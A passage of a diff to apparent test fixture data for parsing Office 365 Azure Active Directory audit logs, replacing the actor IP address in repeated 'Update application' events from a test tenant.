[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"corre
lationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": 
false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -5406,9 +5406,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T18:25:54",
 "ExtendedProperties": [
 {
@@ -5611,7 +5611,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"corre
lationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": 
false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -5641,9 +5641,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T18:25:54",
 "ExtendedProperties": [
 {
@@ -5846,7 +5846,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Na